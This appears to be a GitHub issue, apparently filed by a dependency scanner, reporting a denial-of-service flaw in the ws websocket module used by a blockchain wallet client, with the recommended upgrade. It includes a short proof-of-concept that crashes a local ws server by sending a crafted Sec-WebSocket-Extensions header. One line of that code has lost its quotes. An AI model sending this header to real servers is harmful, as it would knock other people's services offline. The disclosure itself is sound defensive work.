This repository has been archived by the owner on Mar 7, 2023. It is now read-only.
Denial of Service (DoS) #545
Comments
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Denial of Service (DoS)
Vulnerable module: ws
Introduced through: [email protected]
Detailed paths
Introduced through: blockchain-wallet-client@blockchain/My-Wallet-V3#c0bf5615c862fb8d7ec5e3f5031c2998b8ddc690 › [email protected]
Remediation: Upgrade to [email protected].
Overview
ws is a simple to use websocket client, server and console for node.js.
Affected versions of this package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.
PoC:
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
Sec-WebSocket-Extensions: ${payload},'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
The text was updated successfully, but these errors were encountered: